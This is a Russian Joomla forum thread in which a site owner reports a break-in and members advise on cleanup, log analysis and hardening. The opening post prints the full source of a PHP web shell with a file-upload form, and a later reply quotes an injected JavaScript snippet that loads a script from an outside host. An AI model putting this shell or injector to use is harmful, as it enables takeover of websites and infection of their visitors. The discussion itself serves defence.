Форум русской поддержки Joomla!® CMS
08.12.2016, 06:08:24 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.
Вам не пришло письмо с кодом активации?

Войти
   
   Начало   Поиск Joomla 3.0 FAQ Joomla 2.5 FAQ Joomla 1.5 FAQ Правила форума Новости Joomla Реклама Войти Регистрация Помощь  
Страниц: [1] 2  Все   Вниз
  Добавить закладку  |  Печать  
Автор

Взломали сайт, есть практика "лечения"?

 (Прочитано 977 раз)
0 Пользователей и 1 Гость смотрят эту тему.
Serebro2009
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 95


« : 30.12.2015, 00:42:23 »

Никто не сталкивался? Сайт взломали, случайно обнаружил файл (krd.html) в корне следующего содержания:

HaCkeD By MuhmadEmad
Long Live to peshmarga
kurdlinux007@gmail.com
*** ISIS !

Может кто знает как бороться? 
Joomla стоит 3.4.7

Так же в корне еще находится файл (apis.php) сожержание:

<?
error_reporting(0);
if(isset($_GET[sdbu]))
   {
      echo"<font color=#FFFFFF>[uname]".php_uname()."[/uname]<br>";
      echo "<font color=#FFFFFF>[pwd]".getcwd()."[/pwd]<br>";
      print "\n";$disable_functions = @ini_get("disable_functions");
      echo "DisablePHP=".$disable_functions; print "<br>";
      echo"<form method=post enctype=multipart/form-data>";
      echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";
        if($_POST["v"]==up)
{ if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){echo"<b>berhasil</b>-->".$_FILES["f"]["name"];}else{echo"<b>gagal";}} 
{ if(@copy($_FILES["emad"]["tmp_name"],$_FILES["emad"]["name"])){echo"<b></b>-->".$_FILES["emad"]["name"];}else{echo"<b>";}}}
?>
Записан
wishlight
Профи
********

Репутация: +200/-1
Offline Offline

Пол: Мужской
Сообщений: 3488


skype aqaus.com


« Ответ #1 : 30.12.2015, 10:12:02 »

http://joomlaforum.ru/index.php/board,104.0.html в основном разделе полно рекомендаций. Советую воспользоватся сканером ai-bolit поле обновления всего, что возможно на сайте.
Записан
winstrool
Завсегдатай
*****

Репутация: +39/-2
Offline Offline

Пол: Мужской
Сообщений: 726


Свободен для работы


« Ответ #2 : 30.12.2015, 10:12:50 »

Joomla стоит 3.4.7
Бывает, что шелы на сайтах месяцами-годами лежат, а юзаются по мере необходимости, эта ветка версии недавно с фиксами вышла, шелы наверняка уже до нее были, более того, на сегодняшний день уже есть https://www.joomla.org/announcements/release-news/5644-joomla-3-4-8-released.html - Joomla 3.4.8
Записан
Serebro2009
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 95


« Ответ #3 : 30.12.2015, 10:59:44 »

http://joomlaforum.ru/index.php/board,104.0.html в основном разделе полно рекомендаций. Советую воспользоватся сканером ai-bolit поле обновления всего, что возможно на сайте.
Сканировал ai-bolit'ом еще до установки различных модулей...отсылал результат Земскову - ответил, что все Ок


елы на сайтах месяцами-годами лежат, а юзаются по мере необходимости, эта ветка версии недавно с фиксами вышла, шелы наверняка уже до нее были, более того, на сегодняшний день уже есть https://www.joomla.org/announcements/release-news/5644-joomla-3-4-8-released.html - Joomla 3.4.8

Угу, обновляюсь
Записан
winstrool
Завсегдатай
*****

Репутация: +39/-2
Offline Offline

Пол: Мужской
Сообщений: 726


Свободен для работы


« Ответ #4 : 30.12.2015, 11:16:56 »

Сканировал ai-bolit'ом еще до установки различных модулей...отсылал результат Земскову - ответил, что все Ок
ai-bolit - это одно из решений к комплексному подходу, второй момент просто также шелл не оказался же.... может это и просто в качестве бегдора лежал, но еще не использовался, в любом случае имеет смысл подумать по усилению защиты сайта, дабы избежать подобных рисков заражения.
Записан
12mv
Завсегдатай
*****

Репутация: +20/-0
Offline Offline

Пол: Женский
Сообщений: 580


Гульсина


« Ответ #5 : 30.12.2015, 11:44:19 »

Мне так кажется, что простого обновления не достаточно. Нужно вылечить сайт, а потом уже обновлять.
скачайте сайт на комп и  поиском по файлам в нотепаде ищите упоминания о подозрительных строчках, чистите и заливайте обратно сайт. В каждой папке нужно проверить и сравнить с дистрибьютором на наличие лишних/подозрительных и сносить. А потом уже обновлять на чистом сайте.
Я свой так и вылечила на 1.5 когда то) Айболитом мне ничего не показывало, а Яндекс и Google заблочили, пришлось самой копать.
Записан
Serebro2009
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 95


« Ответ #6 : 30.12.2015, 11:50:03 »

ai-bolit - это одно из решений к комплексному подходу, второй момент просто также шелл не оказался же.... может это и просто в качестве бегдора лежал, но еще не использовался, в любом случае имеет смысл подумать по усилению защиты сайта, дабы избежать подобных рисков заражения.
Спасибо, сканирую повторно

>>Мне так кажется, что простого обновления не достаточно. Нужно вылечить сайт, а потом уже обновлять.
Как бы, не могу понять от чего лечить. файлы шелла - удалил. В корне и в папке tmp.
Меня больше интересует, а как можно проанализировать, может это брутфорс? Как-то можно отследить количество попыток ввода пароля для ftp?
Записан
Serebro2009
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 95


« Ответ #7 : 30.12.2015, 11:58:22 »

В папке log, есть файл error.php В нем 20 тысяч запросов вида:

2015-11-17T05:55:13+00:00   INFO 46.161.3.92   joomlafailure   Имя пользователя и пароль не совпадают или у вас ещё нет учётной записи на сайте
2015-11-17T05:55:19+00:00   INFO 46.161.3.92   joomlafailure   Имя пользователя и пароль не совпадают или у вас ещё нет учётной записи на сайте
2015-11-17T05:55:24+00:00   INFO 46.161.3.92   joomlafailure   Имя пользователя и пароль не совпадают или у вас ещё нет учётной записи на сайте
2015-11-17T05:55:28+00:00   INFO 46.161.3.92   joomlafailure   Имя пользователя и пароль не совпадают или у вас ещё нет учётной записи на сайте
Записан
SeBun
Практически профи
*******

Репутация: +134/-3
Offline Offline

Пол: Мужской
Сообщений: 2286



« Ответ #8 : 30.12.2015, 11:59:21 »

В папке log, есть файл error.php В нем 20 тысяч запросов вида:

2015-11-17T05:55:13+00:00   INFO 46.161.3.92   joomlafailure   Имя пользователя и пароль не совпадают или у вас ещё нет учётной записи на сайте
Похоже на брут.
Записан
winstrool
Завсегдатай
*****

Репутация: +39/-2
Offline Offline

Пол: Мужской
Сообщений: 726


Свободен для работы


« Ответ #9 : 30.12.2015, 12:01:36 »

Да, там ведутся записи, о не верной аутентификации, админку нужно дополнительно защищать!
Записан
Serebro2009
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 95


« Ответ #10 : 30.12.2015, 12:02:02 »

Первая запись от 04.11 последняя от 29.12...вчера и обнаружил файл. Это чего, меня пытались взломать полтора месяца?)
Записан
12mv
Завсегдатай
*****

Репутация: +20/-0
Offline Offline

Пол: Женский
Сообщений: 580


Гульсина


« Ответ #11 : 30.12.2015, 12:04:43 »

Как бы, не могу понять от чего лечить. файлы шелла - удалил. В корне и в папке tmp.
Меня больше интересует, а как можно проанализировать, может это брутфорс? Как-то можно отследить количество попыток ввода пароля для ftp?

Определить можно по лог файлам, с каких IP заходили, учше попросить хостеров чтобы вытащили.

Простого удаления сторонних файлов не достаточно, нужно так же вычистить и файлы в которые был добавлен код.
В моём случае, были заражены js файлы ( 749  файлов)

во всех файлах этих был код:

Код:
function g(){var r=new RegExp("(?:; )?1=([^;]*);?");return r.test(document.cookie)?true:false}var e=new Date();e.setTime(e.getTime()+(2592000000));
if(!g()&&window.navigator.cookieEnabled){document.cookie="1=1;expires="+e.toGMTString()+";path=/";document.write('<scr'+'ipt src="http://yourstat.org/yourstat.php"></scr'+'ipt>');}

Все зараженные файлы я тут нашла: http://antivirus-alarm.ru/
После чистки и перепроверки, показало что всё чисто, Яндекс и Google разбанили тоже.
Записан
SeBun
Практически профи
*******

Репутация: +134/-3
Offline Offline

Пол: Мужской
Сообщений: 2286



« Ответ #12 : 30.12.2015, 12:13:54 »

Определить можно по лог файлам, с каких IP заходили...
Что бы понять, как действует взломщик, нужно самому быть немного хакером и знать механизмы получения доступа к сайту, а их довольно много. Логи при этом могут не всегда вестись. Например, если выполняется SQL-инъект.
Записан
Serebro2009
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 95


« Ответ #13 : 30.12.2015, 12:15:20 »

Проверил http://antivirus-alarm.ru/ пока все чисто.
Модификации файлов, можно отследить по их последнему изменению?
Записан
Serebro2009
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 95


« Ответ #14 : 30.12.2015, 12:16:40 »

Что бы понять, как действует взломщик, нужно самому быть немного хакером и знать механизмы получения доступа к сайту, а их довольно много. Логи при этом могут не всегда вестись. Например, если выполняется SQL-инъект.
Я пока смотрю...в сторону плагинов которые помогут отследить это
Записан
winstrool
Завсегдатай
*****

Репутация: +39/-2
Offline Offline

Пол: Мужской
Сообщений: 726


Свободен для работы


« Ответ #15 : 30.12.2015, 12:25:19 »

Проверил http://antivirus-alarm.ru/ пока все чисто.
Модификации файлов, можно отследить по их последнему изменению?
Если взломщик не менял то да, но опытные меняют, у файлов есть три атрибута даты, дата создания, дата изминения и дата доступа(вроде так...), вы в своих панелях, как правило, видите только дату изменения, которую можно поправить функцией touch();

Чтобы вообще понять некоторые аспекты уязвимости сайтов и серваков, залейте сами к себе на сайт WSO shell (как пример) и по изучайте возможности того, чего вы сможете сделать если вы внутри, и что вам вообще нужно сделать чтоб избежать этого, по изучайте различные варианты бегдоров, посмотрите как они работают, попробуйте написать свои варианты, это вам поможет понять общею философию сего дела.
Записан
12mv
Завсегдатай
*****

Репутация: +20/-0
Offline Offline

Пол: Женский
Сообщений: 580


Гульсина


« Ответ #16 : 30.12.2015, 12:27:27 »

Мне тут видео скинули, как шелл заливают. Руки бы оторвала.

https://www.youtube.com/watch?v=UBdYoIiX0mA
Записан
SeBun
Практически профи
*******

Репутация: +134/-3
Offline Offline

Пол: Мужской
Сообщений: 2286



« Ответ #17 : 30.12.2015, 12:30:28 »

Мне тут видео скинули, как шелл заливают. Руки бы оторвала.
Нужно не руки отрывать, а учиться элементарным правилам безопасности. Почитайте...
Записан
winstrool
Завсегдатай
*****

Репутация: +39/-2
Offline Offline

Пол: Мужской
Сообщений: 726


Свободен для работы


« Ответ #18 : 30.12.2015, 12:31:30 »

Мне тут видео скинули, как шелл заливают. Руки бы оторвала.

https://www.youtube.com/watch?v=UBdYoIiX0mA
... да на твоем видео еще и ядро рутабельное, что может привести к рууту всего хостинга!...

Отрывай  laugh laugh laugh
https://forum.antichat.ru/threads/398859/

P.S: Меня честно иногда удивляет, когда люди лезут в защиту и лечения сайтов, не понимая техник, методик взлома и троянизации систем.
« Последнее редактирование: 30.12.2015, 12:43:44 от winstrool » Записан
Serebro2009
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 95


« Ответ #19 : 30.12.2015, 12:36:28 »

В соседней ветке есть цитата:

Цитировать
В логах нашел записи
86.123.69.119 - - [17/Dec/2015:10:30:37 +0300] "GET / HTTP/1.1" 200 32849 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0"
86.123.69.119 - - [17/Dec/2015:10:30:39 +0300] "GET / HTTP/1.1" 200 35301 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0"
86.123.69.119 - - [17/Dec/2015:10:30:40 +0300] "GET /config.php HTTP/1.1" 200 170 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0"

Данные логи нужно просить у хостера?
Записан
winstrool
Завсегдатай
*****

Репутация: +39/-2
Offline Offline

Пол: Мужской
Сообщений: 726


Свободен для работы


« Ответ #20 : 30.12.2015, 12:38:30 »

Все проси, все пригодятся, если умеешь анализировать, а если нет, то толку не будет...
Записан
Serebro2009
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 95


« Ответ #21 : 30.12.2015, 12:50:02 »

Теперь нужно и пароль к базе данных менять. Это можно сделать в фале configuration.php?
Записан
winstrool
Завсегдатай
*****

Репутация: +39/-2
Offline Offline

Пол: Мужской
Сообщений: 726


Свободен для работы


« Ответ #22 : 30.12.2015, 12:52:32 »

Теперь нужно и пароль к базе данных менять. Это можно сделать в фале configuration.php?
Сначала в центральной панели хостинга, а потом в configuration.php
Записан
wishlight
Профи
********

Репутация: +200/-1
Offline Offline

Пол: Мужской
Сообщений: 3488


skype aqaus.com


« Ответ #23 : 30.12.2015, 12:53:20 »

Там данные доступа меняются. А сам пароль через панель управления или консоль. Если вы уже сменили пароль к пользователю базы данных, то да в configuration.php пишутся новые данные.
Записан
12mv
Завсегдатай
*****

Репутация: +20/-0
Offline Offline

Пол: Женский
Сообщений: 580


Гульсина


« Ответ #24 : 30.12.2015, 12:58:15 »

Теперь нужно и пароль к базе данных менять. Это можно сделать в фале configuration.php?

И не только там, знаю дурная привычка, ftp оставлять, поработал, удалить доступ.
Записан
Serebro2009
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 95


« Ответ #25 : 30.12.2015, 13:03:04 »

Сменил через консоль а Azn configuration.php не дает редактировать по ftp) Где меняются привилегии?
Записан
Serebro2009
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 95


« Ответ #26 : 30.12.2015, 13:06:33 »

Ага все изменил...) спасибо
Записан
flyingspook
Moderator
*****

Репутация: +226/-9
Offline Offline

Сообщений: 3534


« Ответ #27 : 30.12.2015, 13:18:09 »

Папку администратора закройте, если еще не закрыли, с помощью http авторизации
Записан
Serebro2009
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 95


« Ответ #28 : 30.12.2015, 13:22:06 »

Ага, читаю как сделать это. Спасибо за совет
Записан
flyingspook
Moderator
*****

Репутация: +226/-9
Offline Offline

Сообщений: 3534


« Ответ #29 : 30.12.2015, 15:52:45 »

Ага, читаю как сделать это. Спасибо за совет
на хостинге в менеджере файлов или еще где есть сейчас практически везде "ограничения на папку" называется, там указываете папку и логин и пас для пользователя вписываете и автоматом все нужные файлы создаются
Записан
Страниц: [1] 2  Все   Вверх
  Добавить закладку  |  Печать  
 
Перейти в:  

Powered by SMF 1.1.21 | SMF © 2006, Simple Machines

Joomlaforum.ru is not affiliated with or endorsed by the Joomla! Project or Open Source Matters.
The Joomla! name and logo is used under a limited license granted by Open Source Matters
the trademark holder in the United States and other countries.

LiveInternet